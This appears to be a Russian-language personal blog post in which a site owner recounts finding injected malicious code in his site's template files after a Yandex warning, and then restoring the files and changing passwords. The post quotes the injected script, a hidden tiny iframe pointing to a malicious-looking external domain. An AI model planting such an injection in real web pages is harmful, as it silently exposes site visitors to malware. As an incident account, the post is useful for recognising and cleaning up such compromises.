2 июля неожиданно пришло мне на почту вот такое письмо от Яндекса:
Some of the pages on your website may pose a threat to your visitor's computer security. The number of potentially harmful pages is 1.
Зарегистрировался на webmaster.yandex.com, запустил повторную проверку. На следующий день оно написало, что всё нормально, но я всё таки решил сравнить все файлы сайта с прошлогодней копией. Оказалось, что отличаются 12 файлов.
В папке temlates два файла имели дату 29.06.12. В файле header.tpl вместо строки
<body style="background: url(<?=PATH_WEB?>img/main_bg.gif) repeat-y center #244e9f;">
обнаружилось вот такое безобразие:
<body style="background: url(<?=PATH_WEB?><!--c3284d--> type="text/javascript">
document.write('<iframe src="httр://yоgоtraff.cu.cc/in.cgi?11" name="Google " scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->
img/main_bg.gif) repeat-y center #244e9f;">
То же самое было в файле galleryEdit.tpl и ещё в десяти файлах в папке script\jscalendar.
Если поискать в Google, этот yogotraff можно встретить в коде множества русских сайтов:
www.google.ru/search?ie=UTF-8&hl=ru&q=yogotraff.
Явно, это какая-то вредоносная дрянь. Разумеется, я восстановил файлы, поменял пароли и написал запрос хостинг-провайдеру, с вопросом каким образом произошло заражение. Получил ответ и логи. В это время кто-то с американского адреса 208.77.96.72 залез на два моих ftp (причём второе находится внутри первого) и заменил там кучу файлов. Как выяснилось, пострадали и другие мои сайты. Провайдер предложил проверить мой компьютер на вирусы. Проверил. DrWeb'ом и Касперским с загрузочных дисков для очистки совести. Нету вирусов. Только всякая мелочёвка в кэше FireFox'а. И как же тогда у меня утащили ftp-пароль? Он сложный, его не подберёшь.
Как страшно жить.